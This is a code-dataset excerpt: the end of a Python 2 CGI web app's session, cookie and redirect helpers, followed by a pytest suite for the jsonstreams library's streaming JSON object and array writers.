file = open( os.path.join( TEMPLATE_DIR, filename ), "r")
template = string.Template(file.read())
file.close()
return template.substitute( substitutionDict )
def print_redirect(url, cookie = None):
print "Status: 302" # temporary redirect
if cookie:
print cookie
print "Location: " + url
print
def logout():
artist = verify_id()
artist.session = ""
antimatter_cookie = Cookie.SimpleCookie()
antimatter_cookie["email"] = artist.email
antimatter_cookie["email"]["expires"] = 0
antimatter_cookie["session"] = artist.session
antimatter_cookie["session"]["expires"] = 0
print_redirect("index.html", antimatter_cookie)
def verify_id():
if os.environ.has_key('HTTP_COOKIE'):
cookie = Cookie.SimpleCookie(os.environ['HTTP_COOKIE'])
if cookie.has_key("email") and cookie.has_key("session"):
matches = Artist.selectBy(email = cookie["email"].value,
session = cookie["session"].value)
if matches.count() > 0:
if matches[0].session != "":
return matches[0]
# If verification fails, kick 'em back out to index.html
print_redirect("index.html")
sys.exit(1)
def get_dir_for_artist(artist, subdir):
# subdir should be "tmp" for temp files and "pub" for published files
# creates it if it doesn't already exist.
dir = os.path.join(ARTIST_FILE_BASE_DIR, "%d" % artist.id)
if not (os.path.isdir(dir)):
os.mkdir(dir)
dir = os.path.join(dir, subdir)
if not (os.path.isdir(dir)):
os.mkdir(dir)
return dir
``` |
{
"source": "JonoYang/jsonstreams",
"score": 2
} |
#### File: jsonstreams/tests/test_stream.py
```python
import json
import textwrap
import pytest # type: ignore
import six
from six.moves import range
import jsonstreams
_ENCODER = json.JSONEncoder() # type: ignore
# pylint: disable=no-self-use
class TestStream(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
s = jsonstreams.Stream(jsonstreams.Type.object, filename='foo')
s.write('foo', 'bar')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_fd(self):
with open('foo', 'w') as f:
with jsonstreams.Stream(jsonstreams.Type.object, fd=f) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_context_manager(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_context_manager_sub(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
with s.subarray('foo') as a:
with a.subarray() as b:
with b.subobject() as c:
with c.subobject('bar') as _:
pass
def test_sub(self):
s = jsonstreams.Stream(jsonstreams.Type.object, filename='foo')
a = s.subarray('foo')
b = a.subarray()
c = b.subobject()
d = c.subobject('bar')
d.close()
c.close()
b.close()
a.close()
s.close()
def test_write_two(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": "foo"}'
def test_subobject(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
with s.subobject('bar') as b:
b.write('1', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": {"1": "foo"}}'
def test_subarray(self):
with jsonstreams.Stream(jsonstreams.Type.array, filename='foo') as s:
s.write('foo')
with s.subarray() as b:
b.write(1)
b.write(2)
with open('foo', 'r') as f:
assert f.read() == '["foo", [1, 2]]'
def test_encoder_indent(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo',
indent=4) as s:
s.write('oink', {'bar': {'b': 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"oink": {
"bar": {
"b": 0
}
}
}""")
def test_pretty(self):
with jsonstreams.Stream(jsonstreams.Type.array, filename='foo',
indent=4, pretty=True) as s:
s.write({'bar': {"b": 0}})
s.write({'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
{
"bar": {
"b": 0
}
},
{
"fob": {
"f": 0
}
}
]""")
class TestIterWrite(object):
"""Tests for the iterwrite object."""
class TestArray(object):
"""Tests for array object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with jsonstreams.Stream(
jsonstreams.Type.array, filename='foo') as s:
s.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
def test_mixed(self):
with jsonstreams.Stream(
jsonstreams.Type.array, filename='foo') as s:
s.iterwrite(range(5))
s.write('a')
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5)) + ['a']
class TestObject(object):
"""Tests for array object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with jsonstreams.Stream(
jsonstreams.Type.object, filename='foo') as s:
s.iterwrite(
((str(s), k) for s in range(5) for k in range(5)))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(s): k for s in range(5) for k in range(5)}
def test_mixed(self):
with jsonstreams.Stream(
jsonstreams.Type.object, filename='foo') as s:
s.iterwrite(
((str(s), k) for s in range(5) for k in range(5)))
s.write("6", 'a')
with open('foo', 'r') as f:
actual = json.load(f)
expected = {str(s): k for s in range(5) for k in range(5)}
expected['6'] = 'a'
assert actual == expected
class TestObject(object):
def test_init(self):
with open('foo', 'w') as f:
jsonstreams.Object(f, 0, 0, _ENCODER)
with open('foo', 'r') as f:
assert f.read() == '{'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as _:
pass
with open('foo', 'r') as f:
assert f.read() == '{}'
class TestWrite(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
class TestWithoutIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": "foo"}'
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', {"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == '{"foo": {"1": "bar"}}'
class TestWithIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": "bar"
}""")
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": "bar",
"bar": "foo"
}""")
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', {"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": {"1": "bar"}
}""")
@pytest.mark.parametrize("key,value,expected", [ # type: ignore
("foo", "bar", '{"foo": "bar"}'),
("foo", 1, '{"foo": 1}'),
("foo", 1.0, '{"foo": 1.0}'),
("foo", None, '{"foo": null}'),
("foo", ["bar"], '{"foo": ["bar"]}'),
("foo", {"foo": "bar"}, '{"foo": {"foo": "bar"}}'),
("foo", ["foo"], '{"foo": ["foo"]}'),
])
def test_types(self, key, value, expected):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write(key, value)
with open('foo', 'r') as f:
assert f.read() == expected
@pytest.mark.parametrize("key", [1, 1.0, None])
def test_invalid_key_types(self, key):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with pytest.raises(jsonstreams.InvalidTypeError):
s.write(key, 'foo')
def test_pretty(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, json.JSONEncoder(indent=4),
pretty=True) as s:
s.write("1", {'bar': {"b": 0}})
s.write("2", {'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"1": {
"bar": {
"b": 0
}
},
"2": {
"fob": {
"f": 0
}
}
}""")
class TestSubobject(object):
"""Tests for the suboboject method."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject('ook')
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar"}}'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar"}}'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 4, 0, _ENCODER)
p = s.subobject('ook')
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": {
"foo": "bar"
}
}""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": {
"foo": "bar"
}
}""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar", "1": "bar"}}'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with s.subobject('ook') as p:
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "ook": {"1": "bar"}}'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write("1", 'bar')
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"1": "bar"}, "foo": "bar"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write("1", 'bar')
with s.subobject('ook') as p:
p.write("1", 'bar')
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "bar", "ook": {"1": "bar"}, "foo": "bar"}'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": {"1": "bar"}}'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write("1", 'foo')
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": {"1": "bar"}}'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.write("1", 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": {"1": "bar"}, "1": "foo"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write('1', 'foo')
p = s.subobject('2')
p.write('1', 'bar')
p.close()
s.write('3', 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "foo", "2": {"1": "bar"}, "3": "foo"}'
class TestSubarray(object):
"""Tests for the subarray method."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray('ook')
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo"]}'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo"]}'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 4, 0, _ENCODER)
p = s.subarray('ook')
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": [
"foo"
]
}""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": [
"foo"
]
}""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
p.write(1)
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo", 1]}'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with s.subarray('ook') as p:
p.write(1)
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "ook": [1]}'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write(1)
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": [1], "foo": "bar"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write("1", 'bar')
with s.subarray('ook') as p:
p.write(1)
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "bar", "ook": [1], "foo": "bar"}'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray("2")
p.write(1)
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": [1]}'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write("1", 'foo')
p = s.subarray("2")
p.write(1)
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": [1]}'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray("2")
p.write(1)
p.close()
s.write("1", 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": [1], "1": "foo"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write('1', 'foo')
p = s.subarray('2')
p.write(1)
p.close()
s.write('3', 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": [1], "3": "foo"}'
class TestClose(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with open('foo', 'r') as f:
assert f.read() == '{}'
def test_close(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.write('foo', 'bar')
def test_write(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.close()
def test_subarray(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subarray('foo')
def test_subobject(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subobject('foo')
class TestWriteToParent(object):
"""Tests for writing to the parent with a subobject open."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
with a.subobject('foo') as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo', 'bar')
def test_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
with a.subarray('foo') as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo', 'bar')
class TestIterWrite(object):
"""Tests for the iterwrite object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
a.iterwrite(six.iteritems({'a': 1, '2': 2, 'foo': None}))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {"a": 1, "2": 2, "foo": None}
def test_mixed(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
a.iterwrite(six.iteritems({'a': 1, '2': 2, 'foo': None}))
a.write('bar', 3)
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {"a": 1, "2": 2, "foo": None, "bar": 3}
def test_pretty_multiple(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(i): i for i in range(5)}
def test_pretty_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(1))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(i): i for i in range(1)}
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"0": 0
}""")
def test_pretty_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with a.subobject('foo') as b:
b.iterwrite((str(i), i) for i in range(2))
expected = {str(i): i for i in range(5)}
expected['foo'] = {str(i): i for i in range(2)}
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
def test_pretty_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with a.subarray('foo') as b:
b.iterwrite(range(2))
expected = {str(i): i for i in range(5)}
expected['foo'] = list(range(2))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
class TestArray(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_init(self):
with open('foo', 'w') as f:
jsonstreams.Array(f, 0, 0, _ENCODER)
with open('foo', 'r') as f:
assert f.read() == '['
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as _:
pass
with open('foo', 'r') as f:
assert f.read() == '[]'
class TestWrite(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
class TestWithoutIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '["foo"]'
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
s.write('bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", "bar"]'
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write({"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}]'
class TestWithIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
"foo"
]""")
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write('foo')
s.write('bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
"foo",
"bar"
]""")
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write({"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{"1": "bar"}
]""")
@pytest.mark.parametrize("value,expected", [ # type: ignore
("foo", '["foo"]'),
(1, '[1]'),
(1.0, '[1.0]'),
(None, '[null]'),
({"foo": "bar"}, '[{"foo": "bar"}]'),
(["foo"], '[["foo"]]'),
])
def test_types(self, value, expected):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(value)
with open('foo', 'r') as f:
assert f.read() == expected
def test_pretty(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, json.JSONEncoder(indent=4),
pretty=True) as s:
s.write({'bar': {"b": 0}})
s.write({'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
{
"bar": {
"b": 0
}
},
{
"fob": {
"f": 0
}
}
]""")
class TestSubobject(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar"}]'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar"}]'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 4, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{
"foo": "bar"
}
]""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{
"foo": "bar"
}
]""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar", "1": "bar"}]'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with s.subobject() as p:
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", {"1": "bar"}]'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write("1", 'bar')
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}, "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(1)
with s.subobject() as p:
p.write("1", 'bar')
s.write(2)
with open('foo', 'r') as f:
assert f.read() == '[1, {"1": "bar"}, 2]'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.write('1', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar", "1": "bar"}]'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write('foo')
p = s.subobject()
p.write('1', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '["foo", {"1": "bar"}]'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('1', 'bar')
p.close()
s.write('foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}, "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write(1)
p = s.subobject()
p.write('1', 'bar')
p.close()
s.write(2)
s.close()
with open('foo', 'r') as f:
assert f.read() == '[1, {"1": "bar"}, 2]'
class TestSubarray(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo"]]'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[["foo"]]'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 4, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
[
"foo"
]
]""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
[
"foo"
]
]""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
p.write('bar')
with open('foo', 'r') as f:
assert f.read() == '[["foo", "bar"]]'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with s.subarray() as p:
p.write('bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", ["bar"]]'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('bar')
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[["bar"], "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(1)
with s.subarray() as p:
p.write('bar')
s.write(2)
with open('foo', 'r') as f:
assert f.read() == '[1, ["bar"], 2]'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.write('bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo", "bar"]]'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write('foo')
p = s.subarray()
p.write('bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '["foo", ["bar"]]'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.write('bar')
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo"], "bar"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write(1)
p = s.subarray()
p.write(1)
p.close()
s.write(2)
s.close()
with open('foo', 'r') as f:
assert f.read() == '[1, [1], 2]'
class TestClose(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with open('foo', 'r') as f:
assert f.read() == '[]'
def test_close(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.write('foo')
def test_write(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.close()
def test_subarray(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subarray()
def test_subobject(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subobject()
class TestWriteToParent(object):
"""Tests for writing to the parent with a subobject open."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
with a.subobject() as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo')
def test_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
with a.subarray() as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo')
class TestIterWrite(object):
"""Tests for the iterwrite object."""
@pytest.fixture(autouse=True)
